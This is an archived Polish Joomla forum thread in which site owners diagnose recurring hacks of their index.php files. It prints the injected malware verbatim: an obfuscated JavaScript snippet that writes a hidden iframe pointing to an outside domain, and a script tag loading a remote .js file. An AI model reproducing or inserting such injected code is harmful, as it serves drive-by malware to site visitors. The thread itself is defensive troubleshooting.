PDA

Zobacz pełną wersję : Problem - potrzebna rada



octred
28-02-2009, 11:13
Witam

Mam taki problem;

Od około 2 dni na kilku moich serwisach postawionych na joomli wersja 1.5 dostaje coś takiego zamiast strony:

Parse error: syntax error, unexpected '<' in /home/linux25/domains/autoszymar.pl/public_html/index.php on line 89


Nadpisuje na ftp łatką z wersji 1.5.8 na 1.5.9 i problem znika.
Ale następnego dnia znów to samo.
Znów nadpisuje pliki i jest ok i dziś z rana znów to samo.

Czy wiecie może co to może być?
Czytałem gdzieś że to włamanie.
Jak się przed tym zabezpieczyć?
Czy możecie coś poradzić?

Bazyl
28-02-2009, 11:33
Chyba trafiłem na dobry dzień - strona działa.

Na forum jest wyszukiwarka, użyj jej.

octred
28-02-2009, 11:43
Działa bo pilnuje żeby działało. ale pada co jakiś czas dlatego szukam rozwiązania problemu.
Nie znalazłem na forum dlatego pytam

Udało mi się wyselekcjonować kod z lini 89 pliku index.php

jest tam coś takiego dopisane za każdym razem jak strona leży w porównaniu z wersją czystą:

<!-- ad -->**********
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv="write";
mzsrv="me";
zqfqw="et";
gdtrk="/' st";
rpiia="yl";
qxaol="";
ldlvw="i";
zfhuu="ty";
hvkhb=":h";
hbqmm="d";
hauzn="";
zdqdp=4;
sjgbi="if";
rpygo="r";
syjnh=" sr";
rwanv="c";
elujl="=";
hrgnc=863;
akzpp=8853;
tplxn=" ";
cvtot="</";
qtndm="";
jlooz=3953;
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv="write";
mzsrv="me";
zqfqw="et";
gdtrk="/' st";
rpiia="yl";
qxaol="";
ldlvw="i";
zfhuu="ty";
hvkhb=":h";
hbqmm="d";
hauzn="";
zdqdp=4;
sjgbi="if";
rpygo="r";
syjnh=" sr";
rwanv="c";
elujl="=";
hrgnc=863;
akzpp=8853;
tplxn=" ";
cvtot="</";
qtndm="";
jlooz=3953;
gftzo=(9.007e3>=5e1?uyimh:qxcxg);
jjaqh=(ddytx>.2438?xkjpv:3.);
gmbpt=(7.3e1>=36?mzsrv:.45);
zxtsi=(323,zqfqw+gdtrk+rpiia+"e='"+"v"+"isib");
hzpmf=(0x587,qxaol+ldlvw+"li"+zfhuu+hvkhb+"id"+hbqmm+"en"+"'"+hauzn);
rmtyf=(6.5e1,"");

aaa=((567,gftzo),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486):(.2717<=.77?jjaqh:0x14))](((zdqdp,2.),(0.591,""+"<"+sjgbi+rpygo+"a")+(82,gmbpt)+(0.1301,syjnh+rwanv+elujl+"'"+"h"+"ttp"+"")+(8581.<.887?0.7:"://t"+"ruittbros.n")+(476,zxtsi)+(hrgnc>=akzpp?9.909e3:hzpmf)+(69<38.?0.249:tplxn+">"+cvtot+"if"+qtndm)+(2.>1.?"ram"+"e>":64.)+(223.>=jlooz?1.:rmtyf)));***********<!-- /ad -->

Bazyl
28-02-2009, 11:58
Likwidujesz skutek, a nie przyczynę.
Jeżeli kod sam się nie dopisał, jeżeli Ty go nie dopisałeś to znaczy, że... zonk!
Sam napisałeś:"czytałem, że to włamanie".

Masz kopie bazy danych, witryny. Odtwórz je, ale najpierw poszukaj dokładniej na forum.
Może wpisz w szukajkę: włamanie.

zwiastun
28-02-2009, 12:11
I jak się nie irytować!
W poprzednim wątku w tym samym dziale pisałem o wirusie atakującym Total Commander. Pisałem sobie a muzom. Od dalszych komentarzy się powstrzymam!
http://forum.joomla.pl/showthread.php?t=26193

gtluczek
05-10-2009, 01:38
>Witam
>Mam taki problem;
>Od około 2 dni na kilku moich serwisach postawionych na joomli wersja 1.5 >dostaje coś takiego zamiast strony:
>Parse error: syntax error, unexpected '<' in >/home/linux25/domains/autoszymar.pl/public_html/index.php on line >[B]89

Miałem coś podobnego ale pozbyłem się ostatniej linni kodu
:eek:<!-- ad --><script type="text/javascript" src="http://www.freeguard.biz/j100coock.js"></script><!-- /ad -->:eek:
z index.php i serwis już mi działa

adminweb
05-10-2009, 07:54
aaaaa...pisze sie trąbi sie,nawołuje Zapomnij o Total Commander
ale gdzie tam,ale po co,a potem RATUNKU POMOCY-Ręce opadają
a jak juz ktoś odpowie skąd masz T.C i Ci odpowie ze ściągnął z paczką z darmowych skryptów ,to tylko takiemu....(spotkałem się z taką odp. na WP)
Czytać w google z hasłem "Total Commander ataki"
i T,C-skasować,dodać bana mu zakratować,wsadzić do puszki i zaspawać:D